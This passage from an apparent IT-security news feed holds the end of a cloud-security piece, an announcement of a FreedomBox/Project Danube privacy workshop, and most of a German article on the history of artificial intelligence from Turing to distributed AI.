<p>To successfully manage this complexity, identify these trends early and begin adjusting your security architecture now. This requires investing in zero-trust foundations, moving toward quantum-safe encryption, and creating governance frameworks for AI systems that address both functionality and security needs. The cloud security landscape is evolving faster than most organizations realize. The question now is whether you are paying attention and, more importantly, whether your security architecture will be prepared for what is coming.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Project Danube / FreedomBox (ds2012)]]></title>
<description><![CDATA[In diesem Workshop wird das "FreedomBox"-Projekt vorgestellt, dabei handelt es sich um sogenannte "Plug Computer", die einfach an eine Steckdose angesteckt werden können und dann für mehr Privatsphäre und mehr Kontrolle über die eigenen persönlichen Daten im Internet sorgen sollen. So kann die Fr...]]></description>
<link>https://tsecurity.de/de/3650449/it-security-video/project-danube-freedombox-ds2012/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650449/it-security-video/project-danube-freedombox-ds2012/</guid>
<pubDate>Tue, 07 Jul 2026 06:03:23 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In diesem Workshop wird das &quot;FreedomBox&quot;-Projekt vorgestellt, dabei handelt es sich um sogenannte &quot;Plug Computer&quot;, die einfach an eine Steckdose angesteckt werden können und dann für mehr Privatsphäre und mehr Kontrolle über die eigenen persönlichen Daten im Internet sorgen sollen. So kann die FreedomBox beispielsweise gewisse Tracking-Scripts der Werbeindustrie filtern und dadurch die allgegenwärtige Überwachung des Surfverhaltens etwas lindern. Weiters kann man die FreedomBox als &quot;persönlichen Datenspeicher&quot; verwenden, was bedeutet dass man seine persönlichen Daten nicht mit unbekannten Risiken in der &quot;Cloud&quot; ablegt, sondern sicher und kontrolliert bei sich zu Hause. Das Ziel des FreedomBox-Projekts ist es letztlich, dezentrale Alternativen zu großen und sehr stark zentralisierten Internet-Diensten zu schaffen. Während des Workshops werden einige FreedomBoxen vorhanden sein, die selbst getestet werden können.

Das FreedomBox-Projekt wurde aus der Überlegung geboren, dass stark zentralisierte Internet-Dienste wie Google und Facebook eine enorme Ansammlung von persönlichen Daten zur Folge haben, was wiederum zu Kontrolle, Macht und Missbrauchspotenzial führt.

Von FreedomBox-Gründer Eben Moglen stammt der Ausspruch, dass Facebook inzwischen mehr Daten über Menschen gesammelt hat, als das alle totalitären Regimen das 20. Jahrhunderts geschafft haben. Das Weltwirtschaftsforum bezeichnet in einem Bericht persönliche Daten als das neue Öl des 21 Jahrhunderts. Die Europäische Union sieht persönliche Daten als potenzielle Quelle für einen Aufschwung und sogar Weg aus der Wirtschaftskrise. In manchen Ländern können persönliche Daten in den falschen Händen zu Folter und Tod führen.

Netzpolitische Fragen rund um persönliche Daten sind hochaktuell. In diesen Bereich fallen zum Beispiel Themen wie die Vorratsdatenspeicherung und die Netzneutralität. Immer mehr Menschen haben das Gefühl, dass persönliche Daten im Internet weder vom Staat noch von kalifornischen Unternehmen abgefangen und ausgewertet werden sollten.

Ein möglicher Ansatz scheint zu sein, dezentrale Netzwerke verschiedener Ausprägung zu schaffen, in denen entweder mehrere Dienstanbieter zur Auswahl stehen, oder sogar jeder Teilnehmer quasi nach dem BitTorrent-Prinzip sein eigener Anbieter sein kann. Dies ist das Ziel der FreedomBox. In einem solchen System ist Privatsphäre nicht nur ein Schlagwort, sondern tief in der technischen Architektur verankert.

Inzwischen gibt es eine offizielle Version 0.1 der FreedomBox-Software, die z.B. Tracking-Scripts und Werbebanner mittels der Softwarepakete &quot;Privoxy&quot;, &quot;AdBlock Plus&quot;, und &quot;HTTP Everywhere&quot; filtern kann.





The idea of the FreedomBox is to produce a small electronic device (a mini computer) that enables private, encrypted communication over the Internet. While the project is only at an early stage, there are many ideas and visions on what such a device could be used for, e.g. for avoiding surveillance and circumventing censorship. Myself, I have experimented with such ideas in the context of Project Danube, an open source project that has worked on decentralized communication for several years.

This workshop will give a live demonstration of 4 Guruplug mini computers that can act as FreedomBoxes. After plugging them into a power outlet, they will automatically connect to each other and form a peer-to-peer network. They can be controlled via a web interface. The peer-to-peer network makes it possible to send messages and share personal data between the Guruplugs.

During the last few months, I have been to several conferences and demonstrated what such mini computers could be used for, e.g. at the Internet Identity Workshop in Mountain View, California, and at the European Identity Conference in Munich, Germany.

At those events, the scenario of the demo was as follows:

1.    The Guruplugs were handed out to volunteer participants and plugged into power outlets.
2.    Upon being plugged in, these small personal servers booted their Debian operating system and custom Project Danube demo software.
3.    The volunteer participants of the demo were able to control their box via a web interface.
4.    The first step to perform was to connect one’s box to the other boxes (using a button on the web interface).
5.    The second step was to sign in to the network with an identifier (using a Distributed Hash Table), in order for boxes to be able to find each other.
6.    After being connected and identified, the demo allowed participants to do the following:
7.    Enter personal data which is stored in an XDI-based Personal Data Store on the box (first name, last name, email, etc.)
8.    Establish a relationship with other participants, which allowed access to the personal data on their boxes via XDI Messaging.
9.    Sending text messages from one box to another.
10.   Sending an “intent” to all boxes on the network (via multicasting), indicating what one would be willing to buy at a given price.
11.   Viewing “intents” received from the network.

During the workshop, we will perform the above steps. Attendants can borrow one of the Guruplugs and participate, and we can have a discussion on the technology and the potential uses of such a mini computer.

Project Danube is an open-source project offering software for identity and personal data services on the Internet. The core of this project is an XDI-based Personal Data Store - a semantic database for your personal data, which always remains under your control. Applications on top of this database include the Federated Social Web, the selective sharing of personal data with organizations, and experimental peer-to-peer communication architectures. The efforts of this project reflect ongoing discourse about political and social questions about anonymity vs. veronymity, centralization vs. decentralization, and the appropriate handling of personal data online.
about this event: https://datenspuren.de/2012/fahrplan/events/5003.de.html]]></content:encoded>
</item>
<item>
<title><![CDATA[Eine kleine Geschichte der künstlichen Intelligenz]]></title>
<description><![CDATA[Eine kleine Geschichte der KI zeigt die wichtigsten Stationen der Künstlichen Intelligenz – vom Mathematiker Turing bis zum IBM-System Watson.
					Foto: John Williams RUS – shutterstock.com




In den letzten Jahren wurden in der Computerwissenschaft und bei der künstlichen Intelligenz (KI) ungl...]]></description>
<link>https://tsecurity.de/de/3650375/it-security-nachrichten/eine-kleine-geschichte-der-kuenstlichen-intelligenz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650375/it-security-nachrichten/eine-kleine-geschichte-der-kuenstlichen-intelligenz/</guid>
<pubDate>Tue, 07 Jul 2026 05:07:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Eine kleine Geschichte der KI zeigt die wichtigsten Stationen der Künstlichen Intelligenz - vom Mathematiker Turing bis zum IBM-System Watson." title="Eine kleine Geschichte der KI zeigt die wichtigsten Stationen der Künstlichen Intelligenz - vom Mathematiker Turing bis zum IBM-System Watson." src="https://images.computerwoche.de/bdb/2683556/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Eine kleine Geschichte der KI zeigt die wichtigsten Stationen der Künstlichen Intelligenz – vom Mathematiker Turing bis zum IBM-System Watson.</p></figcaption></figure><p class="imageCredit">
					Foto: John Williams RUS – shutterstock.com</p></div>




<p>In den letzten Jahren wurden in der Computerwissenschaft und bei der künstlichen Intelligenz (KI) unglaubliche Fortschritte erzielt. Watson, Siri oder Deep Learning zeigen, dass KI-Systeme inzwischen Leistungen vollbringen, die als intelligent und kreativ eingestuft werden müssen. Und es gibt heute immer weniger Unternehmen, die auf <a title="Künstliche Intelligenz" href="https://www.computerwoche.de/article/2753333/wie-kuenstliche-intelligenz-arbeit-und-gesellschaft-veraendert.html" target="_blank">KI</a> verzichten können, wenn sie ihr Business optimieren oder Kosten sparen möchten.</p>



<p>KI-Systeme sind zweifellos sehr nützlich. In dem Maße wie die Welt komplexer wird, müssen wir unsere menschlichen Ressourcen klug nutzen, und qualitativ hochwertige Computersysteme helfen dabei. Dies gilt auch für Anwendungen, die Intelligenz erfordern. Die andere Seite der KI-Medaille ist: Die Möglichkeit, dass eine Maschine Intelligenz besitzen könnte, erschreckt viele. Die meisten Menschen sind der Ansicht, dass Intelligenz etwas einzigartiges ist, was den Homo sapiens auszeichnet. Wenn Intelligenz aber mechanisiert werden kann, was ist dann noch einzigartig am Menschen und was unterscheidet ihn von der Maschine?</p>



<p>Das Streben nach einer künstlichen Kopie des Menschen und der damit verbundene Fragenkomplex sind nicht neu. Die Reproduktion und Imitation des Denkens beschäftigte schon unsere Vorfahren. Vom 16. Jahrhundert an wimmelte es in Legenden und in der Realität von künstlichen Geschöpfen. Homunculi, mechanische Automaten, der Golem, der Mälzel’sche Schachautomat oder Frankenstein waren in den vergangenen Jahrhunderten alles phantasievolle oder reale Versuche, künstlich Intelligenzen herzustellen – und das zu nachzuahmen, was uns Wesentlich ist.</p>



<h2 class="wp-block-heading">Künstliche Intelligenz – die Vorarbeiten</h2>



<p>Allein, es fehlten die formalen und materiellen Möglichkeiten, in denen sich Intelligenz realisieren konnte. Dazu sind zumindest zwei Dinge notwendig. Auf der einen Seite braucht es eine formale Sprache, in die sich kognitive Prozesse abbilden lassen und in der sich rein formal – zum Beispiel durch Regelanwendungen – neues Wissen generieren lässt. Ein solcher formaler Apparat zeichnete sich Ende des 19. Jahrhunderts mit der Logik ab.</p>



<p>Die Philosophen und Mathematiker Gottfried Wilhelm Leibniz, George Boole und Gottlob Frege haben die alte aristotelische Logik entscheidend weiterentwickelt, und in den 30er Jahren des letzten Jahrhunderts zeigte der Österreicher Kurt Gödel mit dem Vollständigkeitssatz die Möglichkeiten – und mit den Unvollständigkeitssätzen die Grenzen – der Logik auf.</p>



<p>Auf der anderen Seite war – analog dem menschlichen Gehirn – ein “Behältnis” oder Medium notwendig, in dem dieser Formalismus “ablaufen” konnte und in dem sich die künstliche Intelligenz realisieren lässt. Mechanische Apparate waren hierfür nicht geeignet, erst mit der Erfindung der Rechenmaschine eröffnete sich eine aussichtsreiche Möglichkeit. In den dreißiger Jahren des 20. Jahrhunderts wurde die Idee einer Rechenmaschine, die früher schon Blaise Pascal und Charles Babbage hatten, wiederbelebt. Während Pascal und Babbage lediglich am Rechner als Zahlenmaschine interessiert waren, die praktischen Zwecken dienen sollte, entstanden zu Beginn des 20. Jahrhunderts konkrete Visionen einer universellen Rechenmaschine.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der britische Mathematiker Alan Turing beeinflusste die Entwicklung der Künstlichen Intelligenz maßgeblich." title="Der britische Mathematiker Alan Turing beeinflusste die Entwicklung der Künstlichen Intelligenz maßgeblich." src="https://images.computerwoche.de/bdb/2683544/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der britische Mathematiker Alan Turing beeinflusste die Entwicklung der Künstlichen Intelligenz maßgeblich.</p></figcaption></figure><p class="imageCredit">
					Foto: Computerhistory.org</p></div>




<p>Einer der wichtigsten Visionäre und Theoretiker war Alan Turing (1912-1954): 1936 bewies der britische Mathematiker, dass eine universelle Rechenmaschine – heute als Turing-Maschine bekannt – möglich ist. Turings zentrale Erkenntnis ist: Eine solche Maschine ist fähig, jedes Problem zu lösen, sofern es durch einen Algorithmus darstellbar und lösbar ist. Übertragen auf menschliche Intelligenz bedeutet das: Sind kognitive Prozesse algorithmisierbar – also in endliche wohldefinierte Einzelschritte zerlegbar – können diese auf einer Maschine ausgeführt werden. Ein paar Jahrzehnte später wurden dann tatsächlich die ersten praktisch verwendbaren Digitalcomputer gebaut. Damit war die “physische Trägersubstanz” für künstliche Intelligenz verfügbar.</p>



<h2 class="wp-block-heading">Der Turing-Test: 1950</h2>



<p>Turing ist noch wegen einer anderen Idee wichtig für die KI: In seinem berühmten Artikel “Computing Machinery and Intelligence” aus dem Jahr 1950 schildert er folgendes Szenario: Angenommen, jemand behauptet, er hätte einen Computer auf dem Intelligenzniveau eines Menschen programmiert. Wie können wir diese Aussage überprüfen? Die naheliegende Möglichkeit, ein IQ-Test, ist wenig sinnvoll. Denn dieser misst lediglich den Grad der Intelligenz, setzt aber eine bestimmte Intelligenz bereits voraus. Bei Computern stellt sich aber gerade die Frage, ob ihnen überhaupt Intelligenz zugesprochen werden kann.</p>



<p>Turing war sich des Problems bei der Definition von intelligentem menschlichem Verhalten im Vergleich zur Maschine bewusst. Um philosophische Diskussionen über die Natur menschlichen Denkens zu umgehen, schlug Turing einen operationalen Test für diese Frage vor.</p>



<p>Ein Computer, sagt Turing, sollte dann als intelligent bezeichnet werden, wenn Menschen bei einem beliebigen Frage-und-Antwort-Spiel, das über eine elektrische Verbindung durchgeführt wird, nicht unterscheiden können, ob am anderen Ende der Leitung dieser Computer oder ein anderer Mensch sitzt. Damit die Stimme und andere menschliche Attribute nichts verraten, solle die Unterhaltung, so Turing, über eine Fernschreiberverbindung – heute würde man sagen: ein Terminal mit Tastatur – erfolgen.</p>



<p>Turings Test zeigt, wie Intelligenz ohne Bezugnahme auf eine physikalische Trägersubstanz geprüft werden kann. Intelligenz ist nicht an die biologische Trägermasse Gehirn gebunden und es würde nichts bringen, eine Denkmaschine durch Einbettung in künstliches Fleisch menschlicher zu machen. Unwichtige physische Eigenschaften – Aussehen, Stimme – werden durch die Versuchsanordnung ausgeschaltet, erfasst wird das reine Denken. Turings Gedankenspiele mündeten später in die Auseinandersetzung zwischen starker und schwacher KI.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der Turing-Test: Wer ist Mensch und wer ist Maschine?" title="Der Turing-Test: Wer ist Mensch und wer ist Maschine?" src="https://images.computerwoche.de/bdb/2683545/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der Turing-Test: Wer ist Mensch und wer ist Maschine?</p></figcaption></figure><p class="imageCredit">
					Foto: Suresh Kumar Mukhiya</p></div>




<h2 class="wp-block-heading">Big Bang in Dartmouth: Das erste KI-Programm – 1956</h2>



<p>Drei Jahre nach Turings Tod, im Jahr 1956, beginnt die eigentliche Geschichte der<a title=" Künstlichen Intelligenz" href="https://www.computerwoche.de/article/2752649/was-sie-ueber-maschinelles-lernen-wissen-muessen.html" target="_blank"> Künstlichen Intelligenz</a>. Als KI-Urknall gilt das “Summer Research Project on <a class="idgGlossaryLink" href="https://www.computerwoche.de/k/kuenstliche-intelligenz-artifical-intelligence,3544" target="_blank">Artificial Intelligence</a>” in Dartmouth im US-Bundesstaat New Hampshire. Unter den Teilnehmern befanden sich der Lisp-Erfinder John McCarthy (1927-2011), KI-Forscher Marvin Minsky (1927-2016), <a class="idgGlossaryLink" href="https://www.computerwoche.de/industry/" target="_blank">IBM</a>-Mitarbeiter Nathaniel Rochester (1919-2001), der Informationstheoretiker Claude Shannon (1916-2001) sowie der Kognitionspsychologe Alan Newell (1927-1992) und der spätere Ökonomie-Nobelpreisträger Herbert Simon (1916-2001).</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Eine Tafel am Gebäude des Dartmouth College erinnert an die legendäre Konferenz von 1956, auf der der Begriff „Artificial Intelligence“ ins Leben gerufen wurde." title="Eine Tafel am Gebäude des Dartmouth College erinnert an die legendäre Konferenz von 1956, auf der der Begriff „Artificial Intelligence“ ins Leben gerufen wurde." src="https://images.computerwoche.de/bdb/2683547/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Eine Tafel am Gebäude des Dartmouth College erinnert an die legendäre Konferenz von 1956, auf der der Begriff „Artificial Intelligence“ ins Leben gerufen wurde.</p></figcaption></figure><p class="imageCredit">
					Foto: Dartmouth.edu</p></div>




<p>Projekte zur maschinellen Sprachübersetzung wurden in Millionenhöhe von der amerikanischen Regierung gefördert. Sätze wurden Wort für Wort übersetzt, zusammengestellt und an die jeweilige Zielsprache angepasst. Die Probleme reduzierten sich darauf, umfangreiche Wörterbücher anzulegen und effizient abzusuchen. Man verkannte in dieser Phase der KI-Forschung, dass Sprache vage und mehrdeutig ist und für automatisches Übersetzen vor allen Dingen umfangreiches Weltwissen erforderlich ist<em>.</em></p>



<h2 class="wp-block-heading">Künstliche Intelligenz im Elfenbeinturm: 1965 bis 1975</h2>



<p>Die zweite Ära der KI lässt sich etwa zwischen 1965 und 1975 ansiedeln und mit dem Schlagwort KI-Winter und Forschung im Elfenbeinturm umschreiben. Weil nicht genügend Fortschritte erkennbar waren, wurde die Finanzierung der US-Regierung für KI-Projekte gekürzt. KI-Forscher zogen sich daraufhin in den Elfenbeinturm zurück und agierten in Spielzeugwelten ohne praktischen Nutzen.</p>



<p>Frustriert von der Komplexität der natürlichen Welt bauten die Forscher in dieser Phase Systeme, die auf künstliche Mikrowelten beschränkt waren. Die Wissenschaftler hofften damit, sich auf das Wesentliche konzentrieren zu können und durch Erweiterung der Mikrowelt-Systeme nach und nach natürliche Umgebungen in den Griff zu bekommen. In dieser Phase erkannten die KI-Forscher die Bedeutung von Wissen für intelligente Systeme.</p>



<p>Ein typisches Programm dieser Periode mit einigem Aufmerksamkeitswert ist SHRDLU von Terry Winograd (1972). Das natürlichsprachliche System agiert in einer überschaubaren Klötzchenwelt, beantwortet Fragen nach der Lage von Klötzchen und stellt Klötzchen auf Anfrage symbolisch um. SHRDLU gilt als das erste Programm, das Sprachverständnis und die Simulation planvoller Tätigkeiten miteinander verbindet.</p>



<p>Ebenfalls in einer überdimensionalen Klötzchenwelt lebte der Ende der sechziger Jahre in Stanford entwickelte erste autonome Roboter – aufgrund seiner ruckartigen Bewegungen SHAKEY genannt. Der Kopf ist eine drehbare Kamera, der Körper ein riesiger Computer. Man konnte ihm Anweisungen geben, wie etwa einen Block von einem Zimmer in ein anderes Zimmer zu bringen. Das dauerte allerdings ziemlich lange. SHAKEY funktionierte leider nur in dieser Laufstall-Umwelt, in der realen Welt war er zum Scheitern verurteilt.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="SHRDLU ist ein natürlichsprachliches System, das in einer überschaubaren Klötzchenwelt agiert, Fragen nach der Lage von Klötzchen beantwortet und Klötzchen auf Anfrage symbolisch umstellt." title="SHRDLU ist ein natürlichsprachliches System, das in einer überschaubaren Klötzchenwelt agiert, Fragen nach der Lage von Klötzchen beantwortet und Klötzchen auf Anfrage symbolisch umstellt." src="https://images.computerwoche.de/bdb/2683549/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">SHRDLU ist ein natürlichsprachliches System, das in einer überschaubaren Klötzchenwelt agiert, Fragen nach der Lage von Klötzchen beantwortet und Klötzchen auf Anfrage symbolisch umstellt.</p></figcaption></figure><p class="imageCredit">
					Foto: http://hci.stanford.edu/winograd/shrdlu/</p></div>




<p>Ende der 1960er Jahre war die Geburtsstunde des ersten <a href="https://www.computerwoche.de/article/2753417/was-unternehmen-ueber-chatbots-wissen-muessen.html" target="_blank" class="idgGlossaryLink">Chatbots</a>: Der KI-Pionier und spätere KI-Kritiker Joseph Weizenbaum (1923-2008) vom MIT entwickelte mit einem relativ simplen Verfahren das “sprachverstehende” Programm ELIZA. Simuliert wird dabei der Dialog eines Psychotherapeuten mit einem Klienten. Das Programm übernahm den Part des Therapeuten, der Nutzer konnte sich mit ihm per Tastatur unterhalten. Weizenbaum selbst war überrascht, auf welch einfache Weise man Menschen die Illusion eines Partners aus Fleisch und Blut vermitteln kann. Er berichtete, seine Sekretärin hätte sich nur in seiner Abwesenheit mit ELIZA unterhalten, was er so interpretierte, dass sie mit dem Computer über ganz persönliche Dinge sprach.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Das Programm ELIZA von Joseph Weizenbaum ahmt einen Psychotherapeuten nach. Hier ein aus dem Englischen übersetztes Beispiel einer Sitzung, die von Weizenbaum aufgezeichnet wurde. Die menschlichen Inputs sind mit „M /&gt;“ gekennzeichnet, die Antwort des Computers ist mit „C&gt;“ angegeben." title="Das Programm ELIZA von Joseph Weizenbaum ahmt einen Psychotherapeuten nach. Hier ein aus dem Englischen übersetztes Beispiel einer Sitzung, die von Weizenbaum aufgezeichnet wurde. Die menschlichen Inputs sind mit „M&gt;“ gekennzeichnet, die Antwort des Computers ist mit „C&gt;“ angegeben." src="https://images.computerwoche.de/bdb/2683550/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Das Programm ELIZA von Joseph Weizenbaum ahmt einen Psychotherapeuten nach. Hier ein aus dem Englischen übersetztes Beispiel einer Sitzung, die von Weizenbaum aufgezeichnet wurde. Die menschlichen Inputs sind mit „M&gt;“ gekennzeichnet, die Antwort des Computers ist mit „C&gt;“ angegeben.</p></figcaption></figure><p class="imageCredit">
					Foto: Weizenbaum</p></div>




<h2 class="wp-block-heading">Denkende KI-Maschinen? – Starke und schwache KI</h2>



<p>In den siebziger Jahren begann ein heftig ausgefochtener Streit um den ontologischen Status von KI-Maschinen. Bezugnehmend auf die Arbeiten von Alan Turing formulierten Allen Newell und Herbert Simon von der Carnegie Mellon University die “Physical Symbol System Hypothesis”. Ihr zufolge ist Denken nicht anderes als Informationsverarbeitung, und Informationsverarbeitung ein Rechenvorgang, bei dem Symbole manipuliert werden. Auf das Gehirn als solches komme es beim Denken nicht an.</p>



<p>Diese Auffassung griff der Philosoph John Searle vehement an. Als Ergebnis dieser Auseinandersetzung stehen sich bis heute mit der schwachen und starken KI zwei konträre Positionen gegenüber. Die schwache KI im Sinne von John Searle behauptet, dass KI-Maschinen menschliche kognitive Funktionen zwar simulieren und nachahmen können. KI-Maschinen erscheinen aber nur intelligent, sie sind es nicht wirklich.</p>



<p>Ein zentrales Argument der schwachen KI lautet: Menschliches Denken ist gebunden an den menschlichen Körper und insbesondere das Gehirn. Kognitive Prozesse haben sich historisch im Zuge der evolutionären Entwicklung von Körper und Gehirn entwickelt. Damit ist Denken notwendigerweise eng verknüpft mit der Biologie des Menschen und kann nicht von dieser getrennt werden. Computer können zwar diese Denkprozesse imitieren, aber das ist etwas ganz anderes als das, wie Menschen denken. Sowenig, wie ein simuliertes Unwetter nass macht, sowenig ist ein simulierter Denkprozess dasselbe wie menschliches Denken.</p>



<p>Im Gegensatz dazu sagen die Anhänger der von Newell und Simon inspirierten starken KI, dass KI-Maschinen in demselben Sinn intelligent sind und denken können wie Menschen. Das ist nicht metaphorisch, sondern wörtlich gemeint. Für die starke KI spricht: So wie Computer aus Hardware bestehen, so bestehen auch Menschen aus Hardware. Im ersten Fall ist es Hardware auf Silizium-Basis, im zweiten Fall biologische “Wetware”. Es spricht grundsätzlich nichts dagegen, dass sich Denken nur auf einer spezifischen Form von Hardware realisieren lässt. Nach allem was man bislang aus der Gehirn- und Bewusstseinsforschung weiß ist eine gewisse Komplexität der Trägersubstanz eine notwendige (und vielleicht auch hinreichende) Bedingung für Denkprozesse. Sind KI-Maschinen also hinreichend komplex, denken sie in der gleichen Weise wie Sie und ich.</p>



<h2 class="wp-block-heading">Expertensysteme – die KI wird praktisch: 1975 bis 1985</h2>



<p>In der dritten Ära ab Mitte der 70er Jahre löste man sich von den Spielzeugwelten und versuchte praktisch einsetzbare Systeme zu bauen, wobei Methoden der Wissensrepräsentation im Vordergrund standen. Die KI verließ ihren Elfenbeinturm und KI-Forschung wurde auch einer breiteren Öffentlichkeit bekannt.</p>



<p>Die von dem US-Informatiker Edward Feigenbaum initiierte Expertensystem-Technologie beschränkt sich zunächst auf den universitären Bereich. Nach und nach entwickelten sich Expertensysteme jedoch zu einem kleinen kommerziellen Erfolg und waren für viele identisch mit der ganzen KI-Forschung – so wie heute für vieleMachine Learning identisch mit KI ist.</p>



<p>In einem Expertensystem wird das Wissen eines bestimmten Fachgebiets in Form von Regeln und großen Wissensbasen repräsentiert. Das bekannteste Expertensystem war das von T. Shortliffe an der Stanford University entwickelten MYCIN. Es diente zur Unterstützung von Diagnose- und Therapieentscheidungen bei Blutinfektionskrankheiten und Meningitis. Ihm wurde durch eine Evaluation attestiert, dass seine Entscheidungen so gut sind wie die eines Experten in dem betreffenden Bereich und besser als die eines Nicht-Experten.</p>



<p>Ausgehend von MYCIN wurden eine Vielzahl weiterer Expertensysteme mit komplexerer Architektur und umfangreichen Regeln entwickelt und in verschiedensten Bereichen eingesetzt. In der Medizin etwa PUFF (Dateninterpretation von Lungentests), CADUCEUS (Diagnostik in der inneren Medizin), in der Chemie DENDRAL (Analyse der Molekularstruktur), in der Geologie PROSPECTOR (Analyse von Gesteinsformationen) oder im Bereich der Informatik das System R1 zur Konfigurierung von Computern, das der Digital Equipment Corporation (DEC) 40 Millionen Dollar pro Jahr einsparte.</p>



<p>Auch das im Schatten der Expertensystem-Euphorie stehende Gebiet der Sprachverarbeitung orientierte sich an praktischen Problemstellungen. Ein typisches Beispiel ist das Dialogsystem HAM-ANS, mit dem ein Dialog in verschiedenen Anwendungsbereichen geführt werden kann. Natürlichsprachliche Schnittstellen zu Datenbanken und Betriebssystemen drangen in den kommerziellen Markt vor wie INTELLECT, F&amp;A oder DOS-MAN.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Expertensysteme wie MYCIN konnten mit Hilfe von Regeln und Wissensbasen Diagnose erstellen und Therapien empfehlen." title="Expertensysteme wie MYCIN konnten mit Hilfe von Regeln und Wissensbasen Diagnose erstellen und Therapien empfehlen." src="https://images.computerwoche.de/bdb/2683551/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Expertensysteme wie MYCIN konnten mit Hilfe von Regeln und Wissensbasen Diagnose erstellen und Therapien empfehlen.</p></figcaption></figure><p class="imageCredit">
					Foto: University of Science and Culture</p></div>




<h2 class="wp-block-heading">Die Renaissance neuronaler Netze: 1985 bis 1990</h2>



<p>Anfang der 80er Jahre kündigte Japan das ehrgeizige “Fifth Generation Project” an, mit dem unter anderem geplant war, praktisch anwendbare KI-Spitzenforschung zu betreiben. Für die KI-Entwicklung favorisierten die Japaner die Programmiersprache PROLOG, die in den siebziger Jahren als europäisches Gegenstück zum US-dominierten LISP vorgestellt worden war. In PROLOG lässt sich eine bestimmte Form der Prädikatenlogik direkt als Programmiersprache verwenden. Japan und Europa waren in der Folge weitgehend PROLOG-dominiert, in den USA setzte man weiterhin auf LISP.</p>



<p>Mitte der 80er bekam die symbolische KI Konkurrenz durch die wieder auferstandenen neuronalen Netze. Basierend auf Ergebnissen der Hirnforschung wurden schon in den vierziger Jahren durch McCulloch, Pitts und Hebb erste mathematische Modelle für künstliche neuronale Netze entworfen. Doch damals fehlten leistungsfähige Computer. Nun in den Achtzigern erlebte das McCulloch-Pitts-Neuron eine Renaissance in Form des sogenannten Konnektionismus.</p>



<p>Der Konnektionismus orientiert sich anders als die symbolverarbeitende KI stärker am biologischen Vorbild des Gehirns. Seine Grundidee ist, dass Informationsverarbeitung auf der Interaktion vieler einfacher, uniformer Verarbeitungselemente basiert und in hohem Maße parallel erfolgt. Neuronale Netze boten beeindruckende Leistungen vor allem auf dem Gebiet des Lernens. Das Programm Netttalk konnte anhand von Beispielsätzen das Sprechen lernen: Durch Eingabe einer begrenzten Menge von geschriebenen Wörtern mit der entsprechenden Aussprache als Phonemketten konnte ein solches Netz zum Beispiel lernen, wie man englische Wörter richtig ausspricht und das gelernte auf unbekannte Wörter richtig anwendet.</p>



<p>Doch selbst dieser zweite Anlauf kam zu früh für neuronale Netze. Zwar boomten die Fördermittel, aber es wurden auch die Grenzen deutlich. Es gab nicht genügend Trainingsdaten, es fehlten Lösungen zur Strukturierung und Modularisierung der Netze und auch die Computer vor der Jahrtausendwende waren immer noch zu langsam.</p>



<h2 class="wp-block-heading">Verteilte KI und Robotik: Künstliche Intelligenz zwischen 1990 und 2010</h2>



<p>Ab etwa 1990 entstand mit der Verteilten KI ein weiterer, neuer Ansatz, der auf Marvin Minsky zurückgeht. In seinem Buch “Society of Mind” beschreibt er den menschlichen Geist als eine Art Gesellschaft: Intelligenz, so Minsky, setzt sich zusammen aus kleinen Einheiten, die primitive Aufgaben erledigen und deren Zusammenwirken erst intelligentes Verhalten erzeugt. Minsky forderte die KI-Gemeinde auf, die individualistische Sackgasse zu überwinden und ganz andere, sozial inspirierte Algorithmen für Parallelrechner zu entwerfen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Marvin Minsky gilt als Vater der Verteilten KI." title="Marvin Minsky gilt als Vater der Verteilten KI." src="https://images.computerwoche.de/bdb/2680348/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Marvin Minsky gilt als Vater der Verteilten KI.</p></figcaption></figure><p class="imageCredit">
					Foto: Creative Commons</p></div>




<p>Sein Schüler Carl Hewitt setzte ein erstes handfestes Modell um, in dem primitive Einheiten – er nannte sie Actoren – miteinander Botschaften austauschten und parallel arbeiteten. Der Gedanke des sozial interagierenden KI-Systems war damit konkret geboren – und Carl Hewitt zum Vater des neuen Ansatzes der Verteilten KI bzw. Distributed AI geworden. Im Rückblick erweisen sich Minsky’s und Hewitt’s Ideen als der Beginn der Agententechnologie, bei der die Zusammenarbeit vieler verschiedener Agenten – sogenannte Multi-Agenten-Systeme -ein enormes Potenzial entfaltet.</p>



